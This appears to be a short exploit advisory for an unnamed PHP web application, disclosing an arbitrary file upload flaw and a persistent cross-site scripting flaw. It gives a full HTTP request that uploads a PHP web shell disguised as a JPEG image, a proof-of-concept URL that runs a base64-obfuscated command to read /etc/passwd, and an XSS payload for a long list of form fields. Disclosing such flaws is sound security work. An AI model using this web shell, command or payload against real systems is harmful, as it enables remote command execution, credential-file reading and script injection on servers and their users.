test.php

1. 1. Arbitrary File Upload:
2. -------------------------
3.  
4. Parameter: myfile (POST)
5. POC URL: http://localhost/uploads/Test.php?cmd=cat%20$%28echo%20L2V0Yy9wYXNzd2Q=%20|%20base64%20-d%29
6.  
7. POST /upload.php HTTP/1.1
8. Host: localhost
9. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
10. Accept: application/json, text/javascript, */*; q=0.01
11. Accept-Language: en-US,en;q=0.5
12. Accept-Encoding: gzip, deflate
13. X-Requested-With: XMLHttpRequest
14. Referer: http://localhost/USERS/index.php
15. Content-Length: 419
16. Content-Type: multipart/form-data; boundary=---------------------------8914507815764
17. Cookie: PHPSESSID=7k4au5p4m0skscj4gjbfedfjs5; AuthU=demo%7Efe01ce2a7fbac8fafaed7c982a04e229%7E1462616214
18. Connection: close
19.  
20. -----------------------------8914507815764
21. Content-Disposition: form-data; name="myfile"; filename="Test.php"
22. Content-Type: image/jpeg
23.  
24. <?php
25. system($_GET['cmd']);
26. ?>
27.  
28. -----------------------------8914507815764
29. Content-Disposition: form-data; name=""
30.  
31. undefined
32. -----------------------------8914507815764
33. Content-Disposition: form-data; name=""
34.  
35. undefined
36. -----------------------------8914507815764--
37.  
38.  
39.  
40. 2. Persistent Cross Site Scripting:
41. -----------------------------------
42.  
43. http://localhost/USERS/index.php
44. Parameters: title, html, headline, size, youtube_id, address, latitude, longitude, user_first_name, user_last_name, agency, user_phone, user_email, website (POST)
45. Payload: " onmousemove=alert(1)